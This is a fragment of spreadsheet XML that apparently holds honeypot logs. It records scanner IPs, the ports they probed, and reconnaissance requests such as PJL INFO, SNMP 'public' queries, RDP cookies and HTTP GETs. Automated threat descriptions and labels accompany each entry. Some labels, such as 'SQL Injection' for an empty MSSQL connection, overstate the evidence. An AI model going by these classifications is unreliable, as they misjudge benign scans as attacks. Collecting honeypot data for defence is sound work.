'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.145,55030)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.145,56466)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.118.29:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (CrCmaXwD,)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.253.43.207:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.233.76.135:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d91</t>
  </si>
  <si>
    <t>90a058535baeae9a4849ea85ac3fb757</t>
  </si>
  <si>
    <t>87.236.176.96</t>
  </si>
  <si>
    <t>motivating.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_IRC_H2</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;3306&amp;&amp;6379&amp;&amp;22&amp;&amp;12715&amp;&amp;1433&amp;&amp;1080&amp;&amp;9100&amp;&amp;1521&amp;&amp;33146&amp;&amp;56295&amp;&amp;NA&amp;&amp;389&amp;&amp;6667&amp;&amp;443&amp;&amp;110&amp;&amp;80&amp;&amp;5900&amp;&amp;25&amp;&amp;21&amp;&amp;143&amp;&amp;445&amp;&amp;23&amp;&amp;39033</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'cvvmvsqo', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.96;tag=cvvmvsqo', 'max-forwards': '0', 'to': 'sip:38.54.115.66', 'via': 'SIP/2.0/UDP 87.236.176.96:5060;branch=z9hG4bKcvvmvsqo;received=87.236.176.96;rport=34341'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.96,36243)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.96,47187)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 203.29.241.98:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}</t>
  </si>
  <si>
    <t>2021-11-25 11:34:08</t>
  </si>
  <si>
    <t>2029-11-25 11:34:08</t>
  </si>
  <si>
    <t>2024-10-10 09:48:31</t>
  </si>
  <si>
    <t>['ALEXIS.NS.CLOUDFLARE.COM', 'RUTH.NS.CLOUDFLARE.COM']</t>
  </si>
  <si>
    <t>NAMECHEAP INC</t>
  </si>
  <si>
    <t>clientTransferProhibited https://icann.org/epp#clientTransferProhibited</t>
  </si>
  <si>
    <t>Redacted for Privacy</t>
  </si>
  <si>
    <t>['abuse@namecheap.com', 'ab6ac7601ddc48dc97771b2b2ae2638f.protect@withheldforprivacy.com']</t>
  </si>
  <si>
    <t>Kalkofnsvegur 2</t>
  </si>
  <si>
    <t>::ffff:57ec:b060</t>
  </si>
  <si>
    <t>Denial Scan</t>
  </si>
  <si>
    <t>55232c0aa21e0fe12dc444ac09417ef1</t>
  </si>
  <si>
    <t>198.235.24.20</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_REDIS_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5432&amp;&amp;161&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;1080&amp;&amp;445&amp;&amp;389&amp;&amp;9100&amp;&amp;3306&amp;&amp;443&amp;&amp;1521&amp;&amp;6379&amp;&amp;3389&amp;&amp;NA&amp;&amp;143&amp;&amp;110&amp;&amp;54696&amp;&amp;6667&amp;&amp;80</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;NA&amp;&amp;GET&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65024)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65026)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,65028)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58118)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58130)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.20,58140)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BlyYahNCN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CgTzbJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bYmbth'}}&amp;&amp;{Data_ORACLE:NA}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1814</t>
  </si>
  <si>
    <t>1bceae00b18f75444e03d27cf5737ed9</t>
  </si>
  <si>
    <t>205.210.31.138</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_NTP_H18&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_PJL_H20&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;21&amp;&amp;389&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;143&amp;&amp;110&amp;&amp;16797&amp;&amp;NA&amp;&amp;1433&amp;&amp;5900&amp;&amp;445&amp;&amp;443&amp;&amp;3306&amp;&amp;3389&amp;&amp;23&amp;&amp;1521&amp;&amp;80&amp;&amp;54981</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;request&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,62702)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,62714)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.138,60752)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ICDGcjfgY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gLUSxs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pWfnUL'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f8a</t>
  </si>
  <si>
    <t>Possible malicious activity: User attempted to establish encrypted connection using TLS protocol to authenticate with FTP service. This could indicate an attempt to hide malicious traffic from detection or use a known vulnerability in the server's SSL/TLS implementation. &amp;&amp; Possible malicious activity detected: An attempt to authenticate using TLS encryption, which could be an attempt to exploit a vulnerability or bypass security measures. This suggests an attacker is trying to establish a secure connection for unauthorized access. The use of TLS encryption in this context may indicate a sophisticated or targeted attack. &amp;&amp; This log entry indicates an attempted scan or probing of a service, possibly for vulnerability exploitation, with no specific malicious activity detected yet. No further action was taken as the attempt seemed non-intrusive. The service itself remains unharmed from this attempt. &amp;&amp; The data suggests an attempt to extract printer information from the system, possibly for reconnaissance or to identify vulnerabilities. This could be a prelude to more malicious activities. The command is likely sent by a remote attacker attempting to gather sensitive information. &amp;&amp; Malicious actor attempting to obtain printer information, possibly as part of a larger attack or reconnaissance effort. This could be an initial probe for potential vulnerabilities within the system. The actor is trying to extract specific details from the printer's configuration.</t>
  </si>
  <si>
    <t>TLS Attack &amp;&amp; SSL Auth &amp;&amp; Brute Force</t>
  </si>
  <si>
    <t>d8446a96b3c1142ae3463811f7e74fcb</t>
  </si>
  <si>
    <t>185.247.137.81</t>
  </si>
  <si>
    <t>sustainable.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse&amp;&amp;Remote Fingerprinting Activity</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_REDIS_H20</t>
  </si>
  <si>
    <t>389&amp;&amp;1433&amp;&amp;6379&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;21&amp;&amp;1521&amp;&amp;3306&amp;&amp;143&amp;&amp;6667&amp;&amp;443&amp;&amp;110&amp;&amp;80&amp;&amp;39735&amp;&amp;NA&amp;&amp;5900&amp;&amp;25&amp;&amp;23</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'fvhjjgjr', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.81;tag=fvhjjgjr', 'max-forwards': '0', 'to': 'sip:154.26.156.60', 'via': 'SIP/2.0/UDP 185.247.137.81:5060;branch=z9hG4bKfvhjjgjr;received=185.247.137.81;rport=42061'}}&amp;&amp;{Data_IRC:{'command': 'FOX.VERSION=S:1.0', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': 'ID=I:1', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:b9f7:8951</t>
  </si>
  <si>
    <t>The data suggests a request to retrieve the version of an IRC service, which could be a reconnaissance attempt by a malicious actor. This might be an initial scan or probing for vulnerabilities in the service. The actor may be attempting to identify potential entry points for further exploitation. &amp;&amp; The attacker is likely attempting to identify the version of a service running on the system by sending a query for the version number. This could be a reconnaissance step before launching a more targeted attack. The request appears to be sent in an attempt to determine if the service matches certain criteria. &amp;&amp; Possible malicious activity: A suspicious command was issued with an ID of 1, which may indicate an attacker attempting to authenticate or gather information. The empty parameters suggest a potential attempt to exploit the service for further actions. This could be an initial phase of a larger attack. &amp;&amp; This log entry indicates that an unknown client attempted to connect to the service, sending an identification command without any parameters, suggesting a reconnaissance or probing attempt. The client is seeking information about the server, which could be a precursor to more malicious activity. This behavior is likely indicative of a scanning or probing action. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected. &amp;&amp; The log indicates an attempt to access Microsoft SQL Server without specifying database credentials, potentially an indication of a brute-force attack or unauthorized access attempt. This can be a malicious activity as it may be used for database exploitation. It suggests the attacker is trying to find unsecured databases to gain unauthorized access.</t>
  </si>
  <si>
    <t>IRCBot &amp;&amp; IRCScan &amp;&amp; IRC Scan &amp;&amp; IRC Attack &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>31b37e631af7bc37a203bc8ff1740b71</t>
  </si>
  <si>
    <t>117.197.133.179</t>
  </si>
  <si>
    <t>Karnal</t>
  </si>
  <si>
    <t>Nīsang</t>
  </si>
  <si>
    <t>1261279</t>
  </si>
  <si>
    <t>29.6923</t>
  </si>
  <si>
    <t>76.7546</t>
  </si>
  <si>
    <t>::ffff:75c5:85b3</t>
  </si>
  <si>
    <t>a7c30a9992ea643a7c328e1f81c4ed9a</t>
  </si>
  <si>
    <t>205.210.31.147</t>
  </si>
  <si>
